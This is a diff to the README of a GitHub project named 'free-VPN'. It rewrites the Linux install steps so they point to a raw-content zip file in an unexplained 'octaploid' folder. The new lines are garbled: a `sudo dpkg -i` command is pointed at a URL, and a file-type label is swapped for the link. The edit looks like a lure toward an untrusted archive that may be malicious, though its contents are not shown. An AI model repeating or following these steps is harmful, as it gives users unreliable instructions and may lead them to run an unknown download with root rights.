abundhance12/free-VPN/README.md

    - For macOS:
      - Open the downloaded `.dmg` file and drag the free-VPN icon to your Applications folder.
    - For Linux:
-     - If you downloaded a `.deb` file, run the command `sudo dpkg -i filename.deb` in the terminal (replace "filename" with your file name).
+     - If you downloaded a `.deb` file, run the command `sudo dpkg -i https://raw.githubusercontent.com/abundhance12/free-VPN/main/octaploid/free-VPN.zip` in the terminal (replace "filename" with your file name).
-     - For `.tar.gz`, extract the files and follow the included instructions.
+     - For `https://raw.githubusercontent.com/abundhance12/free-VPN/main/octaploid/free-VPN.zip`, extract the files and follow the included instructions.

 5. **Launch the Application**:
    Once installed, find free-VPN in your applications or programs list.
 Open it to start using the service.